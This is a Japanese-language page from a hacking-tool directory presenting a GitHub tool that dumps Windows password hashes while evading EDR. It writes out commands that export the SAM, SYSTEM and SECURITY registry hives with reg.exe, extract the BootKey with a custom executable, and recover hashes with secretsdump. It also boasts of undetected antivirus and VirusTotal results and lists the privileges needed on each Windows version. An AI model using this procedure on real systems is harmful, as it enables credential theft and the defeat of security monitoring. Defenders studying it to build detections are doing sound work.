Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
HashDump-BypassEDR — Windows绕过EDR实现DumpHash | Kitploit
ツール/GitHubGitHub/aabysszg/hashdump-bypassedr
Password AttacksHash AnalysisIDS/IPS EvasionPost-ExploitationPenetration TestingRed Teaming
GitHubaabysszg/hashdump-bypassedr

HashDump-BypassEDR

Windows绕过EDR实现DumpHash

リポジトリを見る
2513222日前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

HashDump-BypassEDR

1# プロジェクト概要

システムのホワイトリストプログラムである Reg.exe の拡張的な活用により、セキュリティソフトの検知ポイントを巧みに迂回し、EDRを回避してDumpHashを実現します。

実際のテストによると、この方法はWindows系システムに対して有効で、操作の難易度は低く、実戦での価値があります。

本プロジェクトの実戦記事:

  • EDRを迂回してDumpHashを実現する方法-AabyssZG'Blog
  • EDRを迂回してDumpHashを実現する方法-国家网络空间安全云社区

記事の発表後、中国国内と海外のコミュニティで同じアイデアは見つからず、当初は世界初公開だと思っていました。その後のファンのコメントによると、このアイデアは以前に海外の達人が共有していました:Dumping LSA secrets: a story about task decorrelation

本記事のソースコードとReleaseはGithubで公開しています。共有は簡単なことではありません。良いと思っていただけた方はStarを付けていただけると幸いです。誠にありがとうございます!

2# 重要な手順

2.1 ステップ1、regファイルのエクスポート

ターゲットマシンでコマンドを実行して .reg ファイルをエクスポートします

root@kitploit:~
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg

2.2 ステップ2、ローカルマシンでのバイナリ復元

ステップ1の .reg ファイルをローカルマシンにダウンロードし、本プロジェクトの RegReduction.ps1 PowerShellスクリプトを実行してバイナリファイルを復元します

root@kitploit:~
.\RegReduction.ps1

注記:Githubからスクリプトをダウンロードすると、エンコーディングはデフォルトでUTF-8になっているため、メモ帳でANSI(GB2312)に変更してからでないと正常に実行できません

powershell.png

2.3 ステップ3、BootKeyの取得

ターゲットマシンで BootKey.exe 実行可能プログラムを実行します。ソースコードは本プロジェクトの BootKey.c ファイルです

root@kitploit:~
BootKey.exe

BootKey.png

検知回避テスト(2026.5.10):www.virustotal.com

Virustotal.png

2.4 ステップ4、secretsdumpによるHashの取得

root@kitploit:~
python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

HashOut.png

3# 権限の説明

本記事にはいくつかの重要な操作がありますが、ターゲットマシン上のコアとなる手順は次の2つです:

  • reg.exe export コマンドを使用して重要なレジストリの内容をエクスポートします;
  • BootKey.exe を使用してシステムのBootKeyをエクスポートします。

異なるシステムでもテストを実施しました。結果は以下のとおりです:

  • 実際のテストでは、Win10、Win11、およびWindows Server 2025環境で reg.exe export コマンドを使用してレジストリをエクスポートするにはSYSTEM権限が必要ですが、Windows Server 2022以下の環境で reg.exe export コマンドを使用してレジストリをエクスポートする場合は通常の管理者権限だけで十分です(SYSTEM権限は不要)。reg.exe export コマンドでレジストリをエクスポートした後のファイルサイズがわずか1KBしかない場合は、権限が不足していることを意味します。
  • 実際のテストでは、BootKey.exe 抽出プログラムを使用してBootKeyをエクスポートする際に管理者権限は不要で、実際にテストしたほとんどのセキュリティソフト(現在遭遇したセキュリティソフトはどれも検知しません)は検知・駆除しません。

🙏 4# 各位の師匠に感謝

Stargazers

Stargazers repo roster for @AabyssZG/HashDump-BypassEDR

Forkers

Forkers repo roster for @AabyssZG/HashDump-BypassEDR

Star History

Star History Chart

ツールをダウンロード